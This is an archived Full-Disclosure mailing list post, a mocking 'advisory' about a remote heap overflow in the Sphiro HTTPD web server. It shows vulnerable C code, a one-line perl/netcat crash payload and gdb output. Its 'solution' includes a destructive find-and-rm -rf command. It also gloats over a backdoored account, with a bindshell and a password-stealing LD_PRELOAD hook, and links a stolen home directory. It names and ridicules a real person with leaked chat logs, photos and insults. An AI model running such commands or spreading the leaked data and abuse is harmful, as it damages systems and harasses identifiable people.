| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3CD97F4E.1DFCA081@mail.gmail.com>
From: slotto at gmail.com (Slotto Corleone)
Subject: H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)
Vulnerability: Sphiro HTTPD remote heap overflow
Affected Releases: Sphiro 0.1B by rave aka Jonny Mast
Vendor: http://www.rosiello.org/ Rosiello Security
leader: Angelo Rosiello aka guilecool aka
ImperialS ircnet takeover gang
irc.taintedknowledge.net #rosiello
Solution:
simple steps:
1. find / -name 'sphiro*' -exec rm -rf {} \;
2. don't run code written by "Rosiello Security"
3. troll @ irc.taintedknowledge.net #rosiello
Description:
.Topic (#rosiello): http://www.rosiello.org
Welcome to Rosiello Security |
nothing is neglected ! | sphiro httpd -->
http://www.taintedknowledge.net/sphiro_release_0.1B.tar.gz -:- 0.2
has superduper multyplexing $rootdude style Yep verry 1337
-rw-r--r-- 1 slotto users 7123221 Apr 25 07:46
sphiro_release_0.1B.tar.gz
AHHHH wtf, 7mb of source? No... Why the hell is pgp source there?
:~/tmp/sphiro/icons$ ls -l
total 6172
-rw-r--r-- 1 slotto users 11390 Apr 19 13:56 403.jpg
-rw-r--r-- 1 slotto users 17139 Apr 19 13:56 404.jpg
-rw-r--r-- 1 slotto users 37025 Apr 19 13:56 500.jpg
-rw-r--r-- 1 slotto users 243 Aug 31 2002 back.png
-rw-r--r-- 1 slotto users 230 Aug 31 2002 folder.png
-rw------- 1 slotto users 6230275 Mar 29 09:23 pgp-6.5.1i-beta2.tar.gz
-rw-r--r-- 1 slotto users 250 Aug 31 2002 unknown.png
- sphiro/libhttp/http_socks.c
int get_request(int type,struct sockaddr_in client,int sc,SSL *s)
...
char buffer[MAX_READ +1];
char auth_buff[MAX_READ+1];
char filename[128];
...
if (!(request=strstr(buffer,"GET ")))
return -1;
request +=strlen ( "GET ");
if ((pb=strstr(request,"HTTP/1.1")) || (pb=strstr(request,"HTTP/1.1")))
*(pb -1)='\0';
if ( ( find_rullefile(request) == auth_file_present) ) {
...
sprintf(filename,"%s%s",config->webroot,request); <-- oops
*** What the feck? This is written by someone who claims to find, exploit, and
release advisories but goes and writes code like this? ***
- sphiro/libhttp/security.c <-- security? heh
int find_rullefile (char *request)
...
char *filename;
...
filename = (char *) malloc ( strlen(request) + strlen(config->webroot) + strlen
("secure.auth") +1 );
...
sprintf( filename,"%s/%s/secure.auth",config->webroot,request+1);
*** nice attempt to dynamically allocate filename this time. but wait,
what if we... ***
perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' |nc localhost 1338
request = "\0"
request+1 = "HTTP/1.1" . "A"x1000 . "\n\n"
ouch!
Core was generated by `./sphiro'.
Program terminated with signal 11, Segmentation fault.
#0 0x400e7123 in mallopt () from /lib/libc.so.6
(gdb) bt
#0 0x400e7123 in mallopt () from /lib/libc.so.6
#1 0x400e61e3 in malloc () from /lib/libc.so.6
#2 0x0804b2a4 in find_rullefile (request=0xbffff414 "") at security.c:62
#3 0x08049d8f in get_request (type=1, client=
{sin_family = 2, sin_port = 58496, sin_addr = {s_addr = 16777343},
sin_zero = "Z*\000\000\b@K?"}, sc=7, s=0x0) at http_socks.c:259
#4 0x08049c13 in start_daemon (port=91) at http_socks.c:146
#5 0x08049269 in main (argc=1094795585, argv=0x41414141) at sphiro.c:68
(gdb)
Unrelated but funny stories of rave (Jonny Mast) getting owned:
- rave gets his account backdoored on kokanin's box. He finds the obviously
placed bindshell stashed as ~/bin/zsh. He laughs and says the backdoor
was lame.
Well he obviously missed the getpass() LD_PRELOAD, ssh, and passwd all on his
local account mailing all his new passwords out. Oh, and he left an
exploit (servu.c)
in his directory for the version of servu ftpd he was running on his home
machine. Oops.
-== Remote Exploit for serv-u version v4.1 [MDTM] ==--
Code by: rave
Contact: rave@...iello.org
Date: Feb 2004
Here is his home directory:
http://fogheaven.phrack.nl/rave.tar.gz
Apr 24 08:20:13 <rave> im about to release my httpd
Apr 24 08:21:01 <rave> yes yes opensource
Apr 24 08:25:20 <rave> fixing the release of the httpd
Apr 24 08:27:50 <rave> does this look 1337 or what
Apr 24 08:27:51 <rave> chmod 777 $install/sphiro/{icons,errors}
Apr 24 08:29:10 * rave is working on the install .sh script that
works with ./configure and the makefiles
...
Apr 24 08:37:27 <rave> ilja #rosiello misses you
Apr 24 08:38:32 <ilja> no 1 in #rosiello
Apr 24 08:39:35 <rave> i do
Apr 24 08:39:40 <rave> im rosiello
Apr 24 08:39:46 <rave> with 21 others
Apr 24 08:40:02 <rave> at tops since whe linked with 0x557 securitu
Apr 24 08:40:05 <rave> at tops since whe linked with 0x557 security
Apr 24 08:40:42 <rave> <-- mercy heeft verlaten (Ping timeout)
Apr 24 08:40:46 <rave> hmm
Apr 24 08:41:07 <rave> he died
Apr 24 08:41:16 <rave> on rosiello i think here as well
Apr 24 08:41:25 <rave> my knife actualy worked
Apr 24 08:41:30 <mercy> O_O
Apr 24 08:41:32 <mercy> right
...
Apr 24 10:09:22 <rave> http://www.taintedknowledge.net/images/people/rave.jpg
Apr 24 10:11:30 <rave> http://www.taintedknowledge.net/images/people/rosiello/
...
Apr 24 10:13:01 <ilja> nraziz is a member of rosiello ?
Apr 24 10:13:24 <rave> no
Apr 24 10:13:29 <rave> a visitor
Apr 24 10:13:33 <rave> mercy is a member
Apr 24 10:13:34 <rave> me
Apr 24 10:13:39 <ilja> mercy is ?
Apr 24 10:13:43 <ilja> didn't know that
Apr 24 10:13:50 <rave> ex w00w00 what his name again
Apr 24 10:13:55 <rave> and angelo
Apr 24 10:14:10 <rave> ex w00w00 napster
Apr 24 10:14:26 <rave> angelo,rave,napster,mercy
Apr 24 10:14:38 <ilja> mercy is really in rosiello ?
Apr 24 10:14:42 <ilja> i though you were kidding
Apr 24 10:15:06 <rave> no im not
...
Apr 24 10:17:23 <rave> no
Apr 24 10:17:33 <rave> angelo has some lag in updating the site
Apr 24 10:17:48 <rave> i was like 3 months in rosiello and still the site sayed
Apr 24 10:17:52 <rave> angelo,phinix
Apr 24 10:17:58 <rave> *phunix
Apr 24 10:18:07 <_demiurge> hey rave
Apr 24 10:18:19 <rave> in the mean while i released 6 remote exploits
for windows
... a few hours later ...
... rave finds out GOBBLES hacked drunken.fi.st ...
Apr 24 13:25:18 <rave> KOKANIN UR BOX IS FUKCING HACKED AND ALL MY
STUFF IS GONE!!!!!!!!!
Apr 24 13:25:19 <rave> ty
Apr 24 13:25:45 <rave> eted
Apr 24 13:25:45 <rave> <calibre> hmm
Apr 24 13:25:49 <rave> oops
Apr 24 13:26:02 <rave> /usr/X11R6/bin/xauth: timeout in locking authority file
/home/rave/.Xauthorityhi from GOBBLES
Apr 24 13:26:02 <rave> rm: /home/GOBBLES_rave: Permission denied
Apr 24 13:26:02 <rave> cp: /tmp/suid_shell_rave: Permission denied
Apr 24 13:26:02 <rave> chmod: /tmp/suid_shell_rave: Operation not
permitted
Apr 24 13:26:02 <rave> rave@...nken:~ $ls
Apr 24 13:26:03 <rave> rave@...nken:~ $ls
Apr 24 13:26:04 <rave> rave@...nken:~ $dir
Apr 24 13:26:06 <rave> -bash: dir: command not found
Apr 24 13:26:08 <rave> rave@...nken:~ $ls
Apr 24 13:26:12 <rave> rave@...nken:~ $
Apr 24 13:26:16 <rave> where is my research
Apr 24 13:26:59 <rave> who the fuck has bee g00fing on that box ?, report to me
and ile show u how mad i am
Apr 24 13:27:16 <rave> that is like 2 years of research missig stupid
fucks
Apr 24 13:27:24 <rave> bah
Apr 24 13:28:58 <rave> sorry i didnt realy intended to react like that
but im mad i hope there are backups some where
Here is your backup rave: http://fogheaven.phrack.nl/rave.tar.gz
--- signature ---
chris, go feck a horse you coqknocker
| chris (~chris@...w.tkn.us) (United States of America)
. ircname : chris
| channels : @#rosiello #knasboll.se #rootshell #tkn
. server : irc.tx.us.taintedknowledge.net (Sponsored By Project 9 Studios)
| register : chris - is a registered nick
| operator : chris (is NOT an IRC warrior)
... You have been Network-Banned.
This terrorism was funded by:
Kajun, thanks for social engineering rave and taking the blame
boobys.org, LOL ROFFLE
<sorbo> Slotto Corleone il boss mafioso di Internet
#plan9, GNU assault team
Powered by blists - more mailing lists